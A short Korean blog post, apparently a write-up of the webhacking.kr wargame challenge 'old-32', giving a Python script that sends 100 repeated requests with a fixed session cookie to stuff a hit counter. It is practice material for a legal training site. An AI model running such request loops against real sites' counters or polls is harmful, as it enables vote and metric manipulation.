[3/23] old-32

지민·2023년 4월 6일
0

보안

목록 보기
5/15

{ ‘PHPSESSID’ : ‘내 브라우저 아이디’ }

를 쿠키에 세팅한 상태로, 아래의 코드를 실행시킨다.

import requests as r

user_name = '{handle}'
url = f"https://webhacking.kr/challenge/code-5/?hit={user_name}"
cookie = {'PHPSESSID': 'qnnuc5g34thmbf0722c9ghd1li'}

for i in range(100):
    print(r.get(url, cookies=cookie))
profile
남들 개발 공부할 때 일기 쓰는 사람

0개의 댓글